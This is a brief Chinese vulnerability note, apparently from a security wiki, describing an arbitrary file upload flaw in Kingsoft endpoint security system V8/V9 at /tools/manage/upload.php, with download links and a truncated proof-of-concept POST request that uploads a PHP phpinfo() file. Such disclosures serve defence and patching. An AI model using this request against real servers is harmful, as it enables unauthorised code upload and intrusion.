跳转至

金山终端安全系统 V8/V9存在文件上传漏洞

程序下载链接 :

V8:http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso%20%22v8%E4%B8%8B%E8%BD%BD%22

V9:http://duba-011.duba.net/netversion/Package/SecManage.iso%20%22v9%E4%B8%8B%E8%BD%BD%22

漏洞点:/tools/manage/upload.php

在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传

PoC:

POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>

ref:

https://forum.butian.net/share/76